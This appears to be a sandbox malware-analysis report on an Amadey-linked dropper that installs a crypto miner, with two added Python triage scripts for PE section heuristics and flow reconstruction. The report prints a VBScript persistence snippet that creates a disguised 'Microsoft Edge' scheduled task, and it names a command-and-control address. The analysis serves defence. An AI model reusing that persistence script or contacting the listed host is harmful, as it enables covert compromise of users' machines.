                                                                                                                                                                Preview:Dim objShell.Set objShell = CreateObject("WScript.Shell")..Dim command.command = "schtasks /create /tn ""Microsoft Edge"" /tr """ & objShell.ExpandEnvironmentStrings("%temp%") & "\Microsoft-Edge.exe"" /sc onlogon /rl highest /f"..objShell.Run command, 0, True..Set objShell = Nothing
                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                Entropy (8bit):7.795901725226477
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iv4/1Nbe9kQpebDo2iXGhnYVEnAnp4E7abB24ga9P06oBCRKthHpOFF9efVw:ik1FnQkbDo/2nqO6D7abByLCWMF9iVw
                                                                                                                                                                MD5:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                SHA1:695EA25EC711D8742399918D0A769151BF44D1A1
                                                                                                                                                                SHA-256:A649E59EA0F6FBA416D10DCD03900EA7BBEE9C2207F46B23E1BA270FF052BFF1
                                                                                                                                                                SHA-512:A5C59D1032032A30104F365D7F8844C8DF2CA38CA52EFD24497091CBAD719A3B3A7305F55569A1FA5D0C1F473AEF36D6847C8544365600CD646B571FC946269A
                                                                                                                                                                Malicious:true

Process:C:\Users\user\AppData\Local\Temp\miner2.0.exe
File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):38400
Entropy (8bit):7.274337601891547
Encrypted:false
SSDEEP:768:kq5xtLVkFxo9120PojL5lVvpFnUkXJ2G95EDYq:bxtL12OojL5l76kXP95EEq
MD5:A8638A5105C9A663B0D6918D64B3AD21
SHA1:F35B98542E4E66FCE0008E7879D82BE48698380C
SHA-256:F795AF49314300157ABF6CBD67B115DD0CD4AD4255E148489051D847FA847E85
SHA-512:1883D3CF8BBE9E1B2FC754621E71A6A4D97114AF87600084BFB8BEDE44B2FD7E0C6DE14280ED284132FCE19D646031AA5836A3150530CA89FBC8513754A35D28
Malicious:true
Yara Hits:
• Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: C:\Users\user\AppData\Local\Temp\svchost64.exe, Author: Joe Security

Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):14544
Entropy (8bit):6.2660301556221185
Encrypted:false
SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:0C0195C48B6B8582FA6F6373032118DA
SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 7%

Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):7680
Entropy (8bit):4.789460636179745
Encrypted:false
SSDEEP:96:TzPLdR1M7kO0wCIbbjDN792+j6ZlmuKyQLW/BEb0TIoDnLz+PWwOH3aLlYR:Htwd0wCknF92+j6Zwu7i0B7ZqWTaY
MD5:7112FD4E6B2CDD13C11B8B04A96769CB
SHA1:1806D301DF0E9FFDA5CFCC76E8237D4C516D4A9E
SHA-256:D40E908BC1FF808DC0B6B3BB674E9DD425880C06F1DBC23C6796EACE385370BA
SHA-512:7ADDBFAA7DDA203E18265DA8252B18DAE3BDBD8C5DA8CDB0C427F1E50A4EB9EE39B12367BF23D524E3FE439EA426A2A3F1A68874F68B6B80B576F8788370C295
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\svchost64.exe
File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):45056
Entropy (8bit):7.795901725226477
Encrypted:false
SSDEEP:768:iv4/1Nbe9kQpebDo2iXGhnYVEnAnp4E7abB24ga9P06oBCRKthHpOFF9efVw:ik1FnQkbDo/2nqO6D7abByLCWMF9iVw
MD5:651396CF297F15A1F92EE0A29E27C4EA
SHA1:695EA25EC711D8742399918D0A769151BF44D1A1
SHA-256:A649E59EA0F6FBA416D10DCD03900EA7BBEE9C2207F46B23E1BA270FF052BFF1
SHA-512:A5C59D1032032A30104F365D7F8844C8DF2CA38CA52EFD24497091CBAD719A3B3A7305F55569A1FA5D0C1F473AEF36D6847C8544365600CD646B571FC946269A
Malicious:true
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):286
                                                                                                                                                                Entropy (8bit):3.4380640507285585
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:6sCSClJllVXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb1dt0:6sIlrrpRKQ1lOmeeDHjzvYRQVft0
                                                                                                                                                                MD5:08AA780ED052C566AEECB12B6DD445E9
                                                                                                                                                                SHA1:E47AC5690977888F9398EC42690E4DD0E62DF82B
                                                                                                                                                                SHA-256:AC23B90BCD3DEE09FE6357DD0963CE814931D9C66E188F2CC61094C5B34FA02E
                                                                                                                                                                SHA-512:658922C8A455E18937108998AD578E29D1356B2A0012084D5A2DA943F564D57C19A1656DF1B67963DD27284295F149FEE27CAF88123E95215F97D2A36E53A7C5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......b....M..mZ....F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................*.@3P.........................
                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):399
                                                                                                                                                                Entropy (8bit):3.2346623411205235
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgc/0ImsIB1o:Vz6ykymUexb1U9cL9c/0Imp0
                                                                                                                                                                MD5:4FB92084B3D98C91E11E366B62C1ECB6
                                                                                                                                                                SHA1:2DB34F466698A87C6036FF803008EF4EAD25EAA6
                                                                                                                                                                SHA-256:44F02E748FC48EBF2E846798DA0DD204614796FAC663795B340697BA9ECDF0DA
                                                                                                                                                                SHA-512:8FF4E417A5929E07995A7CC53BC366313803D9D13CEC8E4397C91D662893CB9A06E1365BE0CE64AF0B3E3B17069712136918D1B38EFBD17EF847B8878DD8E38D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 45056 100 45056 0 0 33893 0 0:00:01 0:00:01 --:--:-- 33927..
                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):63
                                                                                                                                                                Entropy (8bit):4.726581708905135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:9ZwOt+kiE2J5xAIluxLE:9twkn23floE
                                                                                                                                                                MD5:1441DF213253942408FB7892349549D0
                                                                                                                                                                SHA1:2421D1DE1A34D83D4044A30EAC57824AF6978D45
                                                                                                                                                                SHA-256:099F17A7C5F91BE0BDD7A1D10E33A34BDBCE5E45AB8C9ABE1CCACDCF3805C23C
                                                                                                                                                                SHA-512:032B3B9AA352546C18B94A7B87919525948366B7FB105142D425A8C56489CF756AE3D204C31A9840A4299169856C7AF8A7C0A21ECDE703555FAD10F7C6E5C04E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Could Not Find C:\Users\user\AppData\Local\Temp\miner2.0.exe..
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.950142025223752
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'862'656 bytes
MD5: dc730eea0eba910485703a74d173f8e2
SHA1: 093f63548d7366b6c3cbfc3ddfca453199e40eca
SHA256: 18894a1a879e0e75c33ec7988c8835b20b42a3fae8c51f1cb4f026f2b855a6b7
SHA512: f1726fae08f206b07ac87ecf890059e98b110a1db0c72add91b89ebbbb5e8d431aacfe31c37028db3cf52eefb7a6bdfc137122b82c7b10dd87e6800a641f933d
SSDEEP: 49152:Rf036dyCkdyKg1Il+5elMr8JYPDaLObL:R06dyR9oIlFlMr5V
TLSH: E18533AFE0510546CDEE033B0E0ED1CE372249479DD66F1801FCA5664BF2E669B5BB09
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x8a1000 (virtual address; RVA 0x4a1000 relative to the image base)
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instructions at entry point:
  jmp 00007FF624C12C6Ah
  cmovp ebx, dword ptr [eax+eax]
  add byte ptr [eax], al
  add byte ptr [eax], al
  jmp 00007FF624C14C65h
  add byte ptr [edi], al
  or al, byte ptr [eax]
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], dh
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], ah
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [ecx], ah
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [edi], al
  or al, byte ptr [eax]
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [edi], al
  add byte ptr [eax], 00000000h
  add byte ptr [eax], al
  add byte ptr [eax], al
  adc byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  add byte ptr [eax], al
  push es
  or al, byte ptr [eax]
  add byte ptr [eax], al
  add byte ptr [eax], al
Data directories:
  Name                                  Virtual Address  Virtual Size  Is in Section
  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
  IMAGE_DIRECTORY_ENTRY_IMPORT          0x6a057          0x6b          .idata
  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x69000          0x1e0         .rsrc
  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x49efd8         0x10          nataabbx
  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
  IMAGE_DIRECTORY_ENTRY_TLS             0x49ef88         0x18          nataabbx
  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
  IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections:
  Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type              Entropy             Characteristics
  (unnamed)  0x1000           0x68000       0x2de00   3cb1062382225bc2111b9f01c0a83d78  False     0.9973763198228883   data                   7.9826212288436125  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  .rsrc      0x69000          0x1e0         0x200     e6a31155863748b138ce7f3105aef787  False     0.580078125          data                   4.538879761011263   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  .idata     0x6a000          0x1000        0x200     cc76e3822efdc911f469a3e3cc9ce9fe  False     0.1484375            data                   1.0428145631430756  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  (unnamed)  0x6b000          0x29f000      0x200     9a9f6632af5b734a7f5d7a363bbf3f70  unknown   unknown              unknown                unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  nataabbx   0x30a000         0x196000      0x195200  b0c6547f32088cd5197f91be5b44a0b3  False     0.9948613709117556   data                   7.954246533814316   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  ijueevze   0x4a0000         0x1000        0x400     26fc48c0552627760abd3c81844dfe2b  False     0.80078125           data                   6.188713023531078   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  .taggant   0x4a1000         0x3000        0x2200    4b3055efcac4608bf6df5682287edf82  False     0.06353400735294118  DOS executable (COM)   0.694309447560145   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Resources:
  Name         RVA       Size   Type                                                      Language  Country        ZLIB Complexity
  RT_MANIFEST  0x49efe8  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727
Imports:
  DLL           Import
  kernel32.dll  lstrcpy
Language of compilation system  Country where language is spoken
English                         United States
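The section table and data directories above are what a triage analyst reads first on an unsigned sample: the entry point sits in a section named .taggant rather than in the first section, every code-bearing section is writable and executable, two sections have entropy above 7.9, the unnamed section at RVA 0x6b000 is 0x29f000 bytes in memory but only 0x200 bytes on disk, and the import table holds a single function (lstrcpy). As an added example (my code, not Joe Sandbox's and not anything from the sample), the following Python rebuilds the two derived columns, "Is in Section" and "Entrypoint Section", from the numbers in those tables and then applies those heuristics to them. The section values are transcribed from the report; the Section class, the function names and the thresholds (entropy at least 7.0, virtual/raw ratio at least 16, at most two imports) are my own triage defaults and not values from the report.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Section characteristic bits (PE/COFF specification).
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x8A1000  # the report prints the entry point as a VA, not an RVA


@dataclass(frozen=True)
class Section:
    name: str
    rva: int
    virtual_size: int
    raw_size: int
    entropy: Optional[float]  # None where the report prints "unknown"
    characteristics: int


_RWX = (IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE
        | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Transcribed from the report's section table (entropy rounded to two decimals).
SECTIONS: List[Section] = [
    Section("",         0x001000, 0x068000, 0x02DE00, 7.98, _RWX),
    Section(".rsrc",    0x069000, 0x0001E0, 0x000200, 4.54, _RW),
    Section(".idata",   0x06A000, 0x001000, 0x000200, 1.04, _RW),
    Section("",         0x06B000, 0x29F000, 0x000200, None, _RWX),
    Section("nataabbx", 0x30A000, 0x196000, 0x195200, 7.95, _RWX),
    Section("ijueevze", 0x4A0000, 0x001000, 0x000400, 6.19, _RWX),
    Section(".taggant", 0x4A1000, 0x003000, 0x002200, 0.69, _RWX),
]
IMPORTS: Dict[str, List[str]] = {"kernel32.dll": ["lstrcpy"]}  # from the import table


def rva_to_section(rva: int, sections: List[Section] = SECTIONS) -> Optional[Section]:
    """The 'Is in Section' column: the section whose virtual range contains the RVA.
    Empty data-directory entries (RVA 0) map to no section."""
    for s in sections:
        if s.rva <= rva < s.rva + s.virtual_size:
            return s
    return None


def entrypoint_section(ep_va: int = ENTRYPOINT_VA, image_base: int = IMAGE_BASE,
                       sections: List[Section] = SECTIONS) -> Optional[Section]:
    """AddressOfEntryPoint is an RVA, so subtract the image base from the printed VA."""
    return rva_to_section(ep_va - image_base, sections)


def packer_indicators(sections: List[Section] = SECTIONS,
                      imports: Dict[str, List[str]] = IMPORTS,
                      ep_va: int = ENTRYPOINT_VA) -> List[str]:
    """Packer/crypter heuristics an analyst applies to a section table by hand.
    Thresholds are my own triage defaults (assumptions), not values from the report."""
    hits: List[str] = []
    ep = entrypoint_section(ep_va, sections=sections)
    if ep is None:
        hits.append("entrypoint outside every section")
    elif ep is not sections[0]:
        hits.append(f"entrypoint in {ep.name!r}, not in the first section")
    for s in sections:
        tag = s.name or f"<unnamed@{s.rva:#x}>"
        if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            hits.append(f"{tag}: writable and executable")
        if s.entropy is not None and s.entropy >= 7.0:
            hits.append(f"{tag}: entropy {s.entropy} (compressed or encrypted payload)")
        if s.raw_size and s.virtual_size // s.raw_size >= 16:
            hits.append(f"{tag}: virtual size {s.virtual_size:#x} vs raw {s.raw_size:#x} "
                        "(zero-filled at load time, typical unpack destination)")
    n_imports = sum(len(v) for v in imports.values())
    if n_imports <= 2:
        hits.append(f"only {n_imports} import(s) {imports}; IAT resolved at runtime")
    return hits


if __name__ == "__main__":
    print("entrypoint section:", entrypoint_section().name)
    for h in packer_indicators():
        print(" -", h)
```

Run against the report's numbers, rva_to_section() places the BASERELOC and TLS directories (0x49efd8, 0x49ef88) in nataabbx and the import directory (0x6a057) in .idata, exactly as the "Is in Section" column shows, and entrypoint_section() resolves 0x8a1000 to .taggant. The heuristics then flag five writable-and-executable sections, the two high-entropy sections, the 0x29f000-byte section backed by 0x200 raw bytes, and the single import; any one of these alone is weak evidence, all of them together on an unsigned binary is the profile of a runtime unpacker, which is why the dynamic findings in the rest of the report (unpacking, debugger and sandbox checks, dropped miner) are the ones to act on.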
Timestamp                        SID      Signature                                                 Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
2024-09-27T17:42:03.185010+0200  2856147  ETPRO MALWARE Amadey CnC Activity M3                      1         192.168.2.4     49737        185.215.113.16  80         TCP
2024-09-27T17:42:03.422402+0200  2856122  ETPRO MALWARE Amadey CnC Response M1                      1         185.215.113.16  80           192.168.2.4     49737      TCP
2024-09-27T17:42:03.636291+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H          3         192.168.2.4     49737        185.215.113.16  80         TCP
2024-09-27T17:42:05.763405+0200  2044696  ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2  1         192.168.2.4     49738        185.215.113.16  80         TCP
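The Suricata alert table above and the TCP packet timeline that follows it are extracted from the report's HTML with the cells run together, so an address followed by a port ("192.168.2.449737") has several syntactically valid readings (192.168.2.4/49737, 192.168.2.44/9737, ...). The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it reconstructs flows and attaches the alerts to them from a few rows copied verbatim from the raw extraction. It assumes that the analysis VM is 192.168.2.4 (the only private address in the report) and that client ports fall in the Windows default dynamic range 49152-65535; HOST, EPHEMERAL and every function name are the example's own.

```python
"""Reconstruct flows and IDS alerts from a flattened Joe Sandbox report.

The packet timeline is parsed first; the remote endpoints it yields then
disambiguate the alert rows, whose signature text may itself end in a
digit ("... M3" directly followed by severity 1).
"""
import re
from collections import defaultdict

HOST = "192.168.2.4"              # assumption: analysis VM address seen throughout the report
EPHEMERAL = range(49152, 65536)   # assumption: Windows default dynamic (client) port range

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4 = rf"{OCTET}(?:\.{OCTET}){{3}}"
PORT = r"[1-9]\d{0,4}"
ALERT_RE = re.compile(r"^(\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d{6}[+-]\d{4})(\d{7})(.+?)(TCP|UDP)$")
PACKET_RE = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(.+)$")

# Constructed sample: rows copied from the report's raw text extraction.
ALERT_ROWS = [
    "2024-09-27T17:42:03.185010+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449737185.215.113.1680TCP",
    "2024-09-27T17:42:03.422402+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.1680192.168.2.449737TCP",
    "2024-09-27T17:42:03.636291+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737185.215.113.1680TCP",
    "2024-09-27T17:42:05.763405+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449738185.215.113.1680TCP",
]
PACKET_ROWS = [
    "Sep 27, 2024 17:42:02.474972010 CEST4973780192.168.2.4185.215.113.16",
    "Sep 27, 2024 17:42:02.480042934 CEST8049737185.215.113.16192.168.2.4",
    "Sep 27, 2024 17:42:02.480129004 CEST4973780192.168.2.4185.215.113.16",
    "Sep 27, 2024 17:42:02.480288982 CEST4973780192.168.2.4185.215.113.16",
    "Sep 27, 2024 17:42:02.485177994 CEST8049737185.215.113.16192.168.2.4",
    "Sep 27, 2024 17:42:03.184892893 CEST8049737185.215.113.16192.168.2.4",
]


def cuts(s, patterns):
    """Yield every way to cut s into len(patterns) pieces, piece i fully
    matching patterns[i].  Brute force is fine: the blobs are ~30 characters."""
    if len(patterns) == 1:
        if re.fullmatch(patterns[0], s):
            yield (s,)
        return
    for i in range(1, len(s)):
        if re.fullmatch(patterns[0], s[:i]):
            for rest in cuts(s[i:], patterns[1:]):
                yield (s[:i],) + rest


def orient(src_ip, src_port, dst_ip, dst_port, known_remotes=None):
    """Return (host_port, remote, outbound) when exactly one end is the VM on
    an ephemeral port and the other end is a plausible remote, else None."""
    src, dst = (src_ip, int(src_port)), (dst_ip, int(dst_port))
    if max(src[1], dst[1]) > 65535:
        return None
    for local, remote, outbound in ((src, dst, True), (dst, src, False)):
        if local[0] == HOST and local[1] in EPHEMERAL and remote[0] != HOST:
            if known_remotes is None or remote in known_remotes:
                return local[1], remote, outbound
    return None


def parse_packet(row):
    """Timeline row -> (timestamp, host_port, remote, outbound); raises unless
    the constraints leave exactly one reading."""
    ts, blob = PACKET_RE.match(row).groups()
    readings = {r for sp, dp, sip, dip in cuts(blob, [PORT, PORT, IPV4, IPV4])
                if (r := orient(sip, sp, dip, dp))}
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} readings for {row!r}")
    return (ts,) + readings.pop()


def alert_readings(row, known_remotes=None):
    """All readings of a Suricata row consistent with the constraints.  Every
    digit in the text is tried as the severity column; without known remotes
    the 'Amadey CnC Response M1' row has more than one reading."""
    ts, sid, rest, proto = ALERT_RE.match(row).groups()
    readings = set()
    for i, ch in enumerate(rest):
        if i == 0 or not ch.isdigit():
            continue
        for sip, sp, dip, dp in cuts(rest[i + 1:], [IPV4, PORT, IPV4, PORT]):
            r = orient(sip, sp, dip, dp, known_remotes)
            if r:
                readings.add((rest[:i].rstrip(), int(ch)) + r)
    return ts, int(sid), proto, readings


def parse_alert(row, known_remotes):
    ts, sid, proto, readings = alert_readings(row, known_remotes)
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} readings for {row!r}")
    sig, sev, host_port, remote, outbound = readings.pop()
    return {"ts": ts, "sid": sid, "proto": proto, "signature": sig, "severity": sev,
            "host_port": host_port, "remote": remote, "outbound": outbound}


def reconstruct(alert_rows=ALERT_ROWS, packet_rows=PACKET_ROWS):
    """Group packets into flows keyed by (host_port, remote), count packets per
    direction, then attach alerts.  An alert whose flow has no packets in the
    sample (port 49738 here) still gets an entry, with zero counts."""
    flows = defaultdict(lambda: {"out": 0, "in": 0, "alerts": []})
    for row in packet_rows:
        _ts, host_port, remote, outbound = parse_packet(row)
        flows[(host_port, remote)]["out" if outbound else "in"] += 1
    known = {remote for _, remote in flows}
    for row in alert_rows:
        a = parse_alert(row, known)
        flows[(a["host_port"], a["remote"])]["alerts"].append((a["sid"], a["signature"], a["severity"]))
    return dict(flows)


if __name__ == "__main__":
    for (port, (ip, rport)), f in sorted(reconstruct().items()):
        print(f"{HOST}:{port} <-> {ip}:{rport}  out={f['out']} in={f['in']} sids={[s for s, _, _ in f['alerts']]}")
```

The order matters: with no known remotes the "Amadey CnC Response M1" row cannot be resolved, because "M11" + "85.215.113.16" is as valid a reading as "M1" + "185.215.113.16". Parsing the timeline first (where the host constraint alone suffices) and feeding its remote endpoints back into the alert parser is what removes that ambiguity; any row that still has more than one reading is reported rather than guessed.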
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 27, 2024 17:42:02.474972010 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:02.480042934 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:02.480129004 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:02.480288982 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:02.485177994 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.184892893 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.185009956 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.186999083 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.191853046 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.414268017 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.414423943 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.417568922 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.422401905 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636137009 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636178970 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636214018 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636246920 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636279106 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636291027 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636312962 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636348009 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636379957 CEST  80           49737      185.215.113.16  192.168.2.4
